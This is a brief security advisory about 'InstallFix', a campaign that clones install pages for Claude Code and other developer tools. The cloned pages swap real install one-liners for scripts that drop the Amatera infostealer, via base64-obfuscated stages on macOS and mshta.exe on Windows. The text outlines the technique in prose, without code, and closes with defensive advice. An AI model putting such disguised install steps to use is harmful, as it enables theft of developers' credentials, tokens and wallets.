Attackers are cloning install pages for Claude Code and other developer tools, replacing legitimate one-liner install commands with malicious scripts that deploy the Amatera infostealer. The technique, dubbed InstallFix, targets both Windows and macOS users. On macOS, a base64-obfuscated second-stage script downloads and executes a binary; on Windows, cmd.exe spawns mshta.exe to run malware as a trusted Microsoft binary. The infostealer harvests browser passwords, cookies, session tokens, and crypto wallet data. Recommendations include slowing down before running terminal commands, verifying sources through official documentation, avoiding copy-paste of commands from untrusted sites, and using real-time anti-malware tools.
Sort: